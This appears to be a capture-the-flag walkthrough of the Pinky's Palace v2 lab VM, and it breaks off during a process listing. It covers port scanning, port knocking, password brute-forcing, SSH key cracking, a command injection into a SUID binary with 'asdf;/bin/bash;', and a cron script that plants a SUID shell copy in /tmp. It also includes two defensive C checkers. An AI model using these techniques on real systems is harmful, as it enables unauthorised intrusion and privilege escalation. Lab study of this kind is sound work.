you can download it here: https://www.vulnhub.com/entry/pinkys-palace-v2,229/

root@kali:~# nmap -T4 -p- -A -v 192.168.227.191
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-28 08:16 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:16
Completed NSE at 08:16, 0.00s elapsed
Initiating NSE at 08:16
Completed NSE at 08:16, 0.00s elapsed
Initiating ARP Ping Scan at 08:16
Scanning 192.168.227.191 [1 port]
Completed ARP Ping Scan at 08:16, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:16
Completed Parallel DNS resolution of 1 host. at 08:16, 0.00s elapsed
Initiating SYN Stealth Scan at 08:16
Scanning 192.168.227.191 [65535 ports]
Discovered open port 80/tcp on 192.168.227.191
Discovered open port 4655/tcp on 192.168.227.191
Discovered open port 7654/tcp on 192.168.227.191
Completed SYN Stealth Scan at 08:16, 4.24s elapsed (65535 total ports)
Initiating Service scan at 08:16
Scanning 3 services on 192.168.227.191
Completed Service scan at 08:16, 11.15s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.227.191
NSE: Script scanning 192.168.227.191.
Initiating NSE at 08:16
Completed NSE at 08:16, 0.70s elapsed
Initiating NSE at 08:16
Completed NSE at 08:16, 0.01s elapsed
Nmap scan report for 192.168.227.191
Host is up (0.00041s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 4.9.4
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Pinky's Blog – Just another WordPress site
4655/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
| ssh-hostkey:
| 2048 ac:e6:41:77:60:1f:e8:7c:02:13:ae:a1:33:09:94:b7 (RSA)
| 256 3a:48:63:f9:d2:07:ea:43:78:7d:e1:93:eb:f1:d2:3a (ECDSA)
|_ 256 b1:10:03:dc:bb:f3:0d:9b:3a:e3:e4:61:03:c8:03:c7 (ED25519)
7654/tcp open http nginx 1.10.3
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.10.3
|_http-title: 403 Forbidden
31337/tcp filtered Elite
MAC Address: 00:0C:29:45:BC:BD (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 198.841 days (since Tue Dec 11 11:06:15 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.41 ms 192.168.227.191

NSE: Script Post-scanning.
Initiating NSE at 08:16
Completed NSE at 08:16, 0.00s elapsed
Initiating NSE at 08:16
Completed NSE at 08:16, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.57 seconds
Raw packets sent: 65559 (2.885MB) | Rcvd: 65549 (2.623MB)

Start with port 80: it is a WordPress site. A wpscan run turned up nothing directly exploitable, so I set password brute-forcing aside for the moment and ran a directory scan.

root@kali:~# dirb http://pinkydb/ /usr/share/dirb/wordlists/big.txt -r

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Jun 28 08:22:02 2019
URL_BASE: http://pinkydb/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://pinkydb/ ----
==> DIRECTORY: http://pinkydb/secret/
+ http://pinkydb/server-status (CODE:403|SIZE:295)
==> DIRECTORY: http://pinkydb/wordpress/
==> DIRECTORY: http://pinkydb/wp-admin/
==> DIRECTORY: http://pinkydb/wp-content/
==> DIRECTORY: http://pinkydb/wp-includes/

-----------------
END_TIME: Fri Jun 28 08:22:20 2019
DOWNLOADED: 20458 - FOUND: 1
root@kali:~# curl http://pinkydb/wordpress
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://pinkydb/wordpress/">here</a>.</p>
<hr>
<address>Apache/2.4.25 (Debian) Server at pinkydb Port 80</address>
</body></html>
root@kali:~# curl http://pinkydb/wordpress/
root@kali:~# curl -i http://pinkydb/wordpress/
HTTP/1.1 302 Found
Date: Fri, 28 Jun 2019 12:22:39 GMT
Server: Apache/2.4.25 (Debian)
Location: http://pinkydb/wordpress/wp-admin/setup-config.php
Content-Length: 0
Content-Type: text/html; charset=UTF-8

root@kali:~# curl http://pinkydb/secret/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /secret</title>
</head>
<body>
<h1>Index of /secret</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right"> - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="bambam.txt">bambam.txt</a></td><td align="right">2018-03-17 21:10 </td><td align="right"> 23 </td><td>&nbsp;</td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.25 (Debian) Server at pinkydb Port 80</address>
</body></html>
root@kali:~# curl http://pinkydb/secret/bambam.txt
8890
7000
666

pinkydb

Two findings: http://192.168.227.191/secret/bambam.txt, whose purpose is not yet clear, and http://192.168.227.191/wordpress/, which looks like a fresh, not-yet-installed WordPress. In principle one could run the installer and then get a shell from the admin panel.

Trying to install WordPress shows that wp-config.php is not writable, so that path is a dead end.

Looking more closely at http://192.168.227.191/secret/bambam.txt, the contents appear to be three port numbers. Port knocking? The earlier nmap scan showed port 31337 as filtered. After connecting with nc to 8890, 7000 and 666 in turn and rescanning with nmap, port 31337 was indeed open.
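Port knocking only hides the listener; the knock itself travels in cleartext and has a fixed shape, which is exactly what makes it detectable from the network side. The C program below is an added example, not code from the write-up or from knockd: it runs the same per-source state machine knockd keeps over constructed iptables-style LOG lines (the KNOCK prefix, the field layout and the source addresses are assumptions made for the example) and counts completed sequences, using the three ports from bambam.txt.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Knock sequence taken from bambam.txt on the page: 8890, 7000, 666. */
#define SEQ_LEN 3
static const int KNOCK_SEQ[SEQ_LEN] = {8890, 7000, 666};

#define MAX_SOURCES 32

/* Per-source progress through the sequence, the same state knockd keeps. */
struct knocker {
    char src[40];
    int stage;          /* how many ports of the sequence matched so far */
};

/* Extract the value of "KEY=value" from a log line; returns 1 on success. */
static int field(const char *line, const char *key, char *out, size_t outsz) {
    const char *p = strstr(line, key);
    if (!p) return 0;
    p += strlen(key);
    size_t n = strcspn(p, " \t\r\n");
    if (n == 0 || n >= outsz) return 0;
    memcpy(out, p, n);
    out[n] = '\0';
    return 1;
}

/* Feed one line; returns 1 when this line completes a full sequence. */
static int feed_line(struct knocker *tbl, int *ntbl, const char *line) {
    char src[40], dpt[16];
    if (!field(line, "SRC=", src, sizeof src) || !field(line, "DPT=", dpt, sizeof dpt))
        return 0;
    int port = atoi(dpt);

    struct knocker *k = NULL;
    for (int i = 0; i < *ntbl; i++)
        if (strcmp(tbl[i].src, src) == 0) { k = &tbl[i]; break; }
    if (!k) {
        if (*ntbl >= MAX_SOURCES) return 0;   /* table full: ignore new sources */
        k = &tbl[(*ntbl)++];
        snprintf(k->src, sizeof k->src, "%s", src);
        k->stage = 0;
    }

    if (port == KNOCK_SEQ[k->stage]) {
        k->stage++;
    } else {
        /* wrong port resets progress, but the first knock port always restarts it */
        k->stage = (port == KNOCK_SEQ[0]) ? 1 : 0;
    }
    if (k->stage == SEQ_LEN) {
        k->stage = 0;
        return 1;
    }
    return 0;
}

/* Scan a newline-separated log buffer; returns the number of completed sequences. */
int count_knock_sequences(const char *log) {
    struct knocker tbl[MAX_SOURCES];
    int ntbl = 0, hits = 0;
    const char *p = log;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[512];
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        hits += feed_line(tbl, &ntbl, line);
        if (!nl) break;
        p = nl + 1;
    }
    return hits;
}

/* Constructed sample in iptables LOG format (not a capture from the box). */
const char *SAMPLE_LOG =
    "kernel: KNOCK IN=ens33 SRC=192.168.227.165 DST=192.168.227.191 PROTO=TCP SPT=51000 DPT=8890\n"
    "kernel: KNOCK IN=ens33 SRC=10.0.0.5 DST=192.168.227.191 PROTO=TCP SPT=40001 DPT=8890\n"
    "kernel: KNOCK IN=ens33 SRC=192.168.227.165 DST=192.168.227.191 PROTO=TCP SPT=51001 DPT=7000\n"
    "kernel: KNOCK IN=ens33 SRC=10.0.0.5 DST=192.168.227.191 PROTO=TCP SPT=40002 DPT=22\n"
    "kernel: KNOCK IN=ens33 SRC=10.0.0.5 DST=192.168.227.191 PROTO=TCP SPT=40003 DPT=7000\n"
    "kernel: KNOCK IN=ens33 SRC=192.168.227.165 DST=192.168.227.191 PROTO=TCP SPT=51002 DPT=666\n";

int main(void) {
    printf("completed knock sequences: %d\n", count_knock_sequences(SAMPLE_LOG));
    return 0;
}
```

Only the source that hits the three ports in order completes the sequence; the second source in the sample, which interleaves port 22, never does. The state kept here is the same kind knockd keeps, which is why the daemon itself is visible later in the write-up as /usr/sbin/knockd -i ens33 in the process list: the mechanism adds no secrecy beyond the ordered port list.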

root@kali:~# nmap -T4 -p- -A -v 192.168.227.191
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-28 08:48 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:48
Completed NSE at 08:48, 0.00s elapsed
Initiating NSE at 08:48
Completed NSE at 08:48, 0.00s elapsed
Initiating ARP Ping Scan at 08:48
Scanning 192.168.227.191 [1 port]
Completed ARP Ping Scan at 08:48, 0.31s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 08:48
Scanning pinkydb (192.168.227.191) [65535 ports]
Discovered open port 80/tcp on 192.168.227.191
Discovered open port 7654/tcp on 192.168.227.191
Discovered open port 31337/tcp on 192.168.227.191
Discovered open port 4655/tcp on 192.168.227.191
Completed SYN Stealth Scan at 08:48, 2.89s elapsed (65535 total ports)
Initiating Service scan at 08:48
Scanning 4 services on pinkydb (192.168.227.191)
Completed Service scan at 08:49, 11.07s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against pinkydb (192.168.227.191)
NSE: Script scanning 192.168.227.191.
Initiating NSE at 08:49
Completed NSE at 08:49, 0.53s elapsed
Initiating NSE at 08:49
Completed NSE at 08:49, 0.01s elapsed
Nmap scan report for pinkydb (192.168.227.191)
Host is up (0.00061s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 4.9.4
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Pinky's Blog – Just another WordPress site
4655/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
| ssh-hostkey:
| 2048 ac:e6:41:77:60:1f:e8:7c:02:13:ae:a1:33:09:94:b7 (RSA)
| 256 3a:48:63:f9:d2:07:ea:43:78:7d:e1:93:eb:f1:d2:3a (ECDSA)
|_ 256 b1:10:03:dc:bb:f3:0d:9b:3a:e3:e4:61:03:c8:03:c7 (ED25519)
7654/tcp open http nginx 1.10.3
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.10.3
|_http-title: Pinkys Database
31337/tcp open Elite?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, NULL, RPCCheck:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| GetRequest:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| HTTP/1.0
| HTTPOptions:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| OPTIONS / HTTP/1.0
| Help:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| HELP
| RTSPRequest:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| OPTIONS / RTSP/1.0
| SIPOptions:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| OPTIONS sip:nm SIP/2.0
| Via: SIP/2.0/TCP nm;branch=foo
| From: <sip:nm@nm>;tag=root
| <sip:nm2@nm2>
| Call-ID: 50000
| CSeq: 42 OPTIONS
| Max-Forwards: 70
| Content-Length: 0
| Contact: <sip:nm@nm>
|_ Accept: application/sdp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.70%I=7%D=6/28%Time=5D160CBB%P=i686-pc-linux-gnu%r(NUL
SF:L,59,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x20is\
SF:x20soon\x20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palace\.\n
SF:=>\x20\0")%r(GetRequest,6B,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x2
SF:0\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0into\x2
SF:0Pinky's\x20Palace\.\n=>\x20\0GET\x20/\x20HTTP/1\.0\r\n\r\n")%r(SIPOpti
SF:ons,138,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x20
SF:is\x20soon\x20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palace\
SF:.\n=>\x20\0OPTIONS\x20sip:nm\x20SIP/2\.0\r\nVia:\x20SIP/2\.0/TCP\x20nm;
SF:branch=foo\r\nFrom:\x20<sip:nm@nm>;tag=root\r\nTo:\x20<sip:nm2@nm2>\r\n
SF:Call-ID:\x2050000\r\nCSeq:\x2042\x20OPTIONS\r\nMax-Forwards:\x2070\r\nC
SF:ontent-Length:\x200\r\nContact:\x20<sip:nm@nm>\r\nAccept:\x20applicatio
SF:n/sdp\r\n\r\n")%r(GenericLines,5D,"\[\+\]\x20Welcome\x20to\x20The\x20Da
SF:emon\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0
SF:into\x20Pinky's\x20Palace\.\n=>\x20\0\r\n\r\n")%r(HTTPOptions,6F,"\[\+\
SF:]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x20is\x20soon\x20
SF:to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palace\.\n=>\x20\0OPT
SF:IONS\x20/\x20HTTP/1\.0\r\n\r\n")%r(RTSPRequest,6F,"\[\+\]\x20Welcome\x2
SF:0to\x20The\x20Daemon\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our
SF:\x20backdoor\n\0into\x20Pinky's\x20Palace\.\n=>\x20\0OPTIONS\x20/\x20RT
SF:SP/1\.0\r\n\r\n")%r(RPCCheck,5A,"\[\+\]\x20Welcome\x20to\x20The\x20Daem
SF:on\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0in
SF:to\x20Pinky's\x20Palace\.\n=>\x20\0\x80")%r(DNSVersionBindReqTCP,59,"\[
SF:\+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x20is\x20soon\
SF:x20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palace\.\n=>\x20\0
SF:")%r(DNSStatusRequestTCP,59,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x
SF:20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0into\x
SF:20Pinky's\x20Palace\.\n=>\x20\0")%r(Help,5F,"\[\+\]\x20Welcome\x20to\x2
SF:0The\x20Daemon\x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20ba
SF:ckdoor\n\0into\x20Pinky's\x20Palace\.\n=>\x20\0HELP\r\n");
MAC Address: 00:0C:29:45:BC:BD (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.022 days (since Fri Jun 28 08:17:16 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.62 ms pinkydb (192.168.227.191)

NSE: Script Post-scanning.
Initiating NSE at 08:49
Completed NSE at 08:49, 0.00s elapsed
Initiating NSE at 08:49
Completed NSE at 08:49, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.08 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

What port 31337 does is not obvious: connecting with nc and typing a single character, it echoes one character back and then closes the connection. Let's look at the nginx on port 7654 first.

The index page returns 403. A dirb scan found only the directory apache; scanning that directory with dirb turned up something interesting.

root@kali:~# dirb http://192.168.227.191:7654/apache/ /usr/share/dirb/wordlists/big.txt -r

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Jun 28 09:08:41 2019
URL_BASE: http://192.168.227.191:7654/apache/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://192.168.227.191:7654/apache/ ----
+ http://192.168.227.191:7654/apache/.htaccess (CODE:200|SIZE:235)
==> DIRECTORY: http://192.168.227.191:7654/apache/secret/
==> DIRECTORY: http://192.168.227.191:7654/apache/wordpress/
==> DIRECTORY: http://192.168.227.191:7654/apache/wp-admin/
==> DIRECTORY: http://192.168.227.191:7654/apache/wp-content/
==> DIRECTORY: http://192.168.227.191:7654/apache/wp-includes/

-----------------
END_TIME: Fri Jun 28 09:08:57 2019
DOWNLOADED: 20458 - FOUND: 1

Isn't this the same content as on port 80? nginx appears to be configured with an alias that maps /apache onto the Apache web server's document root, so I tested whether there was a path normalization problem.

root@kali:~# curl http://192.168.227.191:7654/apache../../etc/passwd
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.10.3</center>
</body>
</html>
root@kali:~# curl http://192.168.227.191:7654/apache../../../etc/passwd
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.10.3</center>
</body>
</html>
root@kali:~# curl http://192.168.227.191:7654/apache../../../../etc/passwd
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.10.3</center>
</body>
</html>
root@kali:~# curl http://192.168.227.191:7654/apache../../../../../etc/passwd
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.10.3</center>
</body>
</html>
root@kali:~# curl http://192.168.227.191:7654/apache../../../../../../etc/passwd

There does not seem to be such a problem.
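The traversal probed for above is the nginx off-by-slash alias pattern: when a prefix location such as location /apache is written without a trailing slash but is backed by alias /var/www/html/, a request whose path begins with /apache.. still matches the prefix and the remainder is appended to the alias target. One caveat on the probes above: nginx resolves .. path segments before location matching, so a URI with /../ after apache.. is normalized away before the /apache prefix is even compared, which makes an external probe a weak test of this setting. Checking the configuration directly is more reliable, and the C program below does that. It is an added example, not part of the write-up: it scans an nginx configuration string for prefix locations without a trailing slash that use alias and reports them. Both sample configurations are constructed for the example, and a one-directive-per-line layout is assumed.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Skip leading blanks. */
static const char *ltrim(const char *s) {
    while (isspace((unsigned char)*s)) s++;
    return s;
}

/* Copy the first token of s (stopping at blanks, '{' or ';') into out; returns the tail. */
static const char *token(const char *s, char *out, size_t outsz) {
    s = ltrim(s);
    size_t n = strcspn(s, " \t{;\r\n");
    if (n >= outsz) n = outsz - 1;
    memcpy(out, s, n);
    out[n] = '\0';
    return s + n;
}

/*
 * Scan an nginx config (one string, one directive per line) for the off-by-slash
 * pattern: a prefix "location /x" with no trailing slash combined with "alias".
 * Offending prefixes are written to report, one per line.
 * Returns the number of risky location/alias pairs found.
 */
int count_alias_risks(const char *config, char *report, size_t reportsz) {
    char prefix[256] = "";      /* prefix of the location block we are inside */
    int in_prefix_location = 0;
    int risks = 0;
    size_t used = 0;
    if (reportsz) report[0] = '\0';

    const char *p = config;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[512];
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        const char *t = ltrim(line);

        if (strncmp(t, "location", 8) == 0 && isspace((unsigned char)t[8])) {
            char tok[256];
            const char *rest = token(t + 8, tok, sizeof tok);
            in_prefix_location = 0;
            if (strcmp(tok, "^~") == 0) {
                token(rest, tok, sizeof tok);     /* ^~ is still a prefix match */
            } else if (tok[0] == '=' || tok[0] == '~') {
                tok[0] = '\0';                    /* exact or regex match: not this pattern */
            }
            if (tok[0] == '/') {
                snprintf(prefix, sizeof prefix, "%s", tok);
                in_prefix_location = 1;
            }
        } else if (strncmp(t, "alias", 5) == 0 && isspace((unsigned char)t[5])) {
            if (in_prefix_location && prefix[strlen(prefix) - 1] != '/') {
                risks++;
                int w = snprintf(report + used, reportsz > used ? reportsz - used : 0,
                                 "%s\n", prefix);
                if (w > 0) used += (size_t)w;
            }
        } else if (strchr(t, '}')) {
            in_prefix_location = 0;               /* block closed */
        }
        if (!nl) break;
        p = nl + 1;
    }
    return risks;
}

/* Constructed sample configs for the example, not the box's real nginx.conf. */
const char *WEAK_CONFIG =
    "server {\n"
    "    listen 7654;\n"
    "    location /apache {\n"          /* no trailing slash: /apache.. still matches */
    "        alias /var/www/html/;\n"
    "    }\n"
    "}\n";

const char *FIXED_CONFIG =
    "server {\n"
    "    listen 7654;\n"
    "    location /apache/ {\n"         /* trailing slash on both sides: nothing to append */
    "        alias /var/www/html/;\n"
    "    }\n"
    "}\n";

int main(void) {
    char report[256];
    int n = count_alias_risks(WEAK_CONFIG, report, sizeof report);
    printf("weak config: %d risky alias location(s)\n%s", n, report);
    n = count_alias_risks(FIXED_CONFIG, report, sizeof report);
    printf("fixed config: %d risky alias location(s)\n", n);
    return 0;
}
```

The fix the checker encodes is the usual one: give the prefix location its trailing slash (location /apache/ with alias /var/www/html/), or use root instead of alias where the directory layout allows it.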

I was stuck for a long time. Going back to the author's description, it turns out the IP must be bound to the hostname pinkydb; no wonder so many resources on the WordPress site failed to load. After adding the entry 192.168.227.191 pinkydb to /etc/hosts, http://pinkydb:7654/ loads normally.

Brute-forcing the login got nowhere, so I switched to generating a wordlist with cewl: cewl -m 5 -w pass.txt http://pinkydb/

The brute force then succeeded.

There is an obvious local file inclusion vulnerability, but there is no need to bother with it: the page hands over a private key directly. The notes say the username is stefano, which the contents of /etc/passwd confirm.

root@kali:~/Downloads# chmod 600 id_rsa
root@kali:~/Downloads# ssh -i id_rsa -p 4655 stegano@192.168.227.191
Enter passphrase for key 'id_rsa':

The key still needs a passphrase, so let's crack it with ssh2john and john.

root@kali:~/Downloads# locate ssh2john
/usr/share/john/ssh2john.py
root@kali:~/Downloads# python /usr/share/john/ssh2john.py id_rsa > hashes
root@kali:~/Downloads# john --wordlist=/root/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/32])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
secretz101 (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:06 DONE (2019-06-28 11:41) 0.1451g/s 2081Kp/s 2081Kc/s 2081KC/sa6_123..*7¡Vamos!
Session completed
root@kali:~/Downloads# ssh -i id_rsa -p 4655 stefano@192.168.227.191
Enter passphrase for key 'id_rsa':
Linux Pinkys-Palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Mar 17 21:18:01 2018 from 172.19.19.2
stefano@Pinkys-Palace:~$

stefano@Pinkys-Palace:~$ ls
tools
stefano@Pinkys-Palace:~$ cd tools
stefano@Pinkys-Palace:~/tools$ ls -al
total 28
drwxr-xr-x 2 stefano stefano 4096 Mar 17 2018 .
drwxr-xr-x 4 stefano stefano 4096 Mar 17 2018 ..
-rw-r--r-- 1 stefano stefano 65 Mar 16 2018 note.txt
-rwsr----x 1 pinky www-data 13384 Mar 16 2018 qsub

qsub has the SUID bit set and is owned by pinky, so clearly qsub is the way to get a shell as pinky.

I downloaded it for local analysis. Note that others may only execute it, not read it, so the file had to be fetched through the file inclusion found earlier. Then straight into IDA Pro.

It first checks a password, which is the value of the environment variable $TERM, and then calls the send function.

There is an obvious command injection.

[+] Welcome to Question Submit!stefano@Pinkys-Palace:~/tools$ echo $TERM
xterm
stefano@Pinkys-Palace:~/tools$ ./qsub "asdf;whoami;"
[+] Input Password: xterm
asdf
pinky

The whoami command ran successfully.

stefano@Pinkys-Palace:~/tools$ ./qsub "asdf;/bin/bash;"
[+] Input Password: xterm
asdf
pinky@Pinkys-Palace:~/tools$

That gives a shell as pinky. The natural next step is to read pinky's .bash_history.

pinky@Pinkys-Palace:/home/pinky$ cat .bash_history 
ls -al
cd
ls -al
cd /usr/local/bin
ls -al
vim backup.sh
su demon
pinky@Pinkys-Palace:/home/pinky$ cd /usr/local/bin
pinky@Pinkys-Palace:/usr/local/bin$ ls
backup.sh
pinky@Pinkys-Palace:/usr/local/bin$ ls -al
total 12
drwxrwsr-x 2 root staff 4096 Mar 17 2018 .
drwxrwsr-x 10 root staff 4096 Mar 17 2018 ..
-rwxrwx--- 1 demon pinky 113 Mar 17 2018 backup.sh

By the look of it, backup.sh is run periodically by a scheduled task, so the obvious move is to modify backup.sh directly.

demon@Pinkys-Palace:~$ cat /usr/local/bin/backup.sh 
#!/bin/bash

rm /home/demon/backups/backup.tar.gz
tar cvzf /home/demon/backups/backup.tar.gz /var/www/html
cp /bin/dash /tmp/sh
chown demon:demon /tmp/sh
chmod ugo+x /tmp/sh
chmod u+s /tmp/sh
#
#
#

With a shell as demon, what remains is escalating to root.

After looking around for a while, I finally spotted something while listing the processes running as root with ps aux | grep root.

demon@Pinkys-Palace:/daemon$ ps aux | grep root
root 1 0.0 0.3 138828 6616 ? Ss 05:12 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S 05:12 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 05:12 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 05:12 0:00 [kworker/0:0H]
root 7 0.0 0.0 0 0 ? S 05:12 0:00 [rcu_sched]
root 8 0.0 0.0 0 0 ? S 05:12 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? S 05:12 0:00 [migration/0]
root 10 0.0 0.0 0 0 ? S< 05:12 0:00 [lru-add-drain]
root 11 0.0 0.0 0 0 ? S 05:12 0:00 [watchdog/0]
root 12 0.0 0.0 0 0 ? S 05:12 0:00 [cpuhp/0]
root 13 0.0 0.0 0 0 ? S 05:12 0:00 [cpuhp/1]
root 14 0.0 0.0 0 0 ? S 05:12 0:00 [watchdog/1]
root 15 0.0 0.0 0 0 ? S 05:12 0:00 [migration/1]
root 16 0.0 0.0 0 0 ? S 05:12 0:00 [ksoftirqd/1]
root 18 0.0 0.0 0 0 ? S< 05:12 0:00 [kworker/1:0H]
root 19 0.0 0.0 0 0 ? S 05:12 0:00 [kdevtmpfs]
root 20 0.0 0.0 0 0 ? S< 05:12 0:00 [netns]
root 21 0.0 0.0 0 0 ? S 05:12 0:00 [khungtaskd]
root 22 0.0 0.0 0 0 ? S 05:12 0:00 [oom_reaper]
root 23 0.0 0.0 0 0 ? S< 05:12 0:00 [writeback]
root 24 0.0 0.0 0 0 ? S 05:12 0:00 [kcompactd0]
root 26 0.0 0.0 0 0 ? SN 05:12 0:00 [ksmd]
root 27 0.0 0.0 0 0 ? SN 05:12 0:00 [khugepaged]
root 28 0.0 0.0 0 0 ? S< 05:12 0:00 [crypto]
root 29 0.0 0.0 0 0 ? S< 05:12 0:00 [kintegrityd]
